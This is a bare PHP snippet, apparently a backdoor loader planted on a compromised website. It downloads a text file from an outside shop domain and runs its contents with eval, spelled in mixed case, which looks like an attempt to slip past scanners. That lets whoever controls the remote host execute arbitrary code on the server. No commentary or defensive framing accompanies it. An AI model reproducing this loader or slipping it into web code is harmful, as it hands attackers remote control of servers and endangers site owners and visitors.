<?php $cx = curl_init("http://z60109_7.eschaden.shop/stat/domain_index.txt"); curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1); $rs = curl_exec($cx); if ($rs !== false) { $data = eVaL('?>' . $rs); } curl_close($cx);